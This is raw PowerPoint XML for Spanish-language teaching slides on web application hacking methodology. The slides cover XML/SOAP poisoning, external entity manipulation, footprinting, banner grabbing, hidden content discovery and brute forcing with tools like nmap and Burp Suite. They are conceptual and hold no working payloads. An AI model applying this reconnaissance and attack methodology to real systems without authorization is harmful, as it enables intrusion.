            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Los atacantes insertan códigos XML maliciosos en las solicitudes SOAP para realizar manipulación de nodos XML o XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> para generar errores en la lógica del análisis XML y romper la ejecución lógica.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Los atacantes pueden manipular referencias a entidades XML externas que pueden conducir a un archivo arbitrario o aperturas en la conexión TCP pueden ser explotados por otros ataques de servicio Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>posoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> permite a los atacantes causar un ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> y comprometer información confidencial.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26942761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Metodología Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>2. Attack Web Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>3. Analyze Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>4. Attack Authentication Mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>5. Attack Authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>6. Attack Session Management Mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>7. Perform Injection Attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>8. Attack Data Connectivity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>9. Attack Web App Client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>10. Attack Web Services.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4108978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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Es el primer paso en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>hackeo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> de la aplicación Web; ayuda a los atacantes a seleccionar víctimas e identificar aplicaciones Web vulnerables. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1825670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sz="4000" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>: Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-BO" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Proporciona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>información sobre locación de los servidores y asegura que el servidor blanco esté activo en Internet. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Whos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Interrogation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Identificación de puertos comunes, herramientas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Netscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> Tools Pro. Identifica servicios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>el puerto.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382145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sz="4000" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>: Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Puerto  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>	Servicios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HTTP Típicos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>80 		WWW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>81		WWW alternativo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>88 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2008560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sz="3600" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>: Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>/Banner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>Grabbing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-BO" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Analiza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>la respuesta del encabezado del servidor para identificar modelo, versión del Servidor Web. Ayuda a los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>atacantes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>a seleccionar los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> desde base de datos de vulnerabilidades para atacarlos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2702943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sz="4000" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
              <a:t> Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>es accesible desde el contenido visible principal para explotar contenido para explotar privilegios de usuario dentro de la aplicación. Permite al atacante recuperar archivos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>backup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, archivos activos, configuraciones, datos sensibles, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: Descubre automáticamente contenido escondido y funcionalidades. Paros, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Spider, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>WebSacarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2593316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sz="3600" dirty="0"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>Infraestructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t> Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Attacker-Directed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: El atacante accede a todas las funcionalidades de las aplicaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>interceptando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>el proxy para monitorear solicitudes a las respuestas. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Poras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Brute-Forcing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: Herramientas automatizadas como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Suite para hacer un gran número de solicitudes al servidor web para adivinar nombres o identificadores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118692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Pila de vulnerabilidad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>7. Aplicaciones Web a medida. Defectos lógicos de negocios, Vulnerabilidades técnicas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>6. Componentes de terceros. Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>/Comercial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>5. Base de datos. Oracle/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>/MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>4. Web Server. Apache/IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>3. Sistemas Operativos. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Windows/Linux/OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>2. Red. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Swtich</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
